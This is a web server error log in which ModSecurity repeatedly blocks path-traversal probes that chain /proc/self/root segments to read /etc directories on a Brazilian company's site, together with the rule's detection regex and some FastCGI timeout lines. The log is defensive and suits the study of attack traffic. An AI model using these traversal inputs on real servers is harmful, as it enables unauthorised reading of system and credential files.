[Tue Mar 17 14:03:19.090000 2026] [:error] [pid 30223:tid 140411733534464] [client 74.7.243.128:35728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJV8T4LuLykoMK_89oIQAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:20.146544 2026] [proxy_fcgi:error] [pid 2473:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47724] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:03:20.551676 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.243.128:40062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJWKBJNF7axNlVR0UWjAAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:22.014945 2026] [:error] [pid 29359:tid 140411741927168] [client 74.7.243.128:40078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJWqSy22zYCMGxsIlcXwAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:23.447113 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.243.128:40092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJW6BJNF7axNlVR0UWjQAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:26.013164 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.243.128:40102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJXgeiSKl8TjouI-YZHAAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:42.117894 2026] [proxy_fcgi:error] [pid 2473:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48262] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:03:44.053535 2026] [:error] [pid 17965:tid 140411666392832] [client 74.7.243.128:40112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJcKt8Nd0UC_OcbVHKrwAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:03:49.667744 2026] [:error] [pid 6296:tid 140411641214720] [client 74.7.243.128:55864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJdXIk7brgkOH-rIWLxgAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:04:05.127970 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49042] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:04:07.006159 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:57310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJh9Y0UrI5A3LftIz7UwAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:04:27.121796 2026] [proxy_fcgi:error] [pid 9299:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49688] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:04:43.002039 2026] [:error] [pid 29359:tid 140411674785536] [client 74.7.241.31:39874] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJq6Sy22zYCMGxsIlcZAAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:04:49.122876 2026] [proxy_fcgi:error] [pid 2598:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50360] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:04:50.519153 2026] [:error] [pid 29151:tid 140411557287680] [client 74.7.241.31:39886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJsvPqhzTj3BvfDX-HswAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:05:01.183500 2026] [:error] [pid 29151:tid 140411699963648] [client 74.7.243.128:47168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJvfPqhzTj3BvfDX-HvgAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:05:04.174453 2026] [:error] [pid 28879:tid 140411582465792] [client 74.7.243.128:47184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJwFDN3UhJjLukrK-LBAAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:05:13.373778 2026] [proxy_fcgi:error] [pid 9299:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51018] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:05:19.841829 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.241.31:36428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJz9CmCSWTlPouqorkDgAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:05:23.361182 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.128:45308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmJ0weiSKl8TjouI-YZbgAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:05:35.137973 2026] [proxy_fcgi:error] [pid 11293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51744] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:05:57.169893 2026] [proxy_fcgi:error] [pid 28879:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52476] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:06:20.132238 2026] [proxy_fcgi:error] [pid 19507:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53354] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:06:42.121808 2026] [proxy_fcgi:error] [pid 17965:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54192] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:07:03.161777 2026] [proxy_fcgi:error] [pid 19507:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:54814] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:07:25.128427 2026] [proxy_fcgi:error] [pid 6296:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55422] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:07:47.129793 2026] [proxy_fcgi:error] [pid 19507:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:56088] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:07:51.780043 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:33036] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKZ9Y0UrI5A3LftIz7sQAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:07:54.258054 2026] [:error] [pid 28243:tid 140411683178240] [client 74.7.241.31:50292] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKag9EzQ9w6IvBX0sUPgAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:07:55.561868 2026] [:error] [pid 28243:tid 140411683178240] [client 74.7.241.31:50300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKaw9EzQ9w6IvBX0sUPwAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:07:59.040459 2026] [:error] [pid 11293:tid 140411741927168] [client 74.7.241.31:50312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKb9CmCSWTlPouqorkoQAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:08:09.125814 2026] [proxy_fcgi:error] [pid 29359:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56792] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:08:14.466666 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.228.61:59048] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmKffPqhzTj3BvfDX-IEgAAAdQ"]
[Tue Mar 17 14:08:14.466900 2026] [:error] [pid 2598:tid 140411716749056] [client 74.7.244.43:37176] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmKfRj0p0SRWAqcjGF5vAAAAwM"]
[Tue Mar 17 14:08:26.836058 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.241.31:48982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKivPqhzTj3BvfDX-IGwAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:08:31.121864 2026] [proxy_fcgi:error] [pid 28243:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57228] AH01075: Error dispatching request to : (polling)
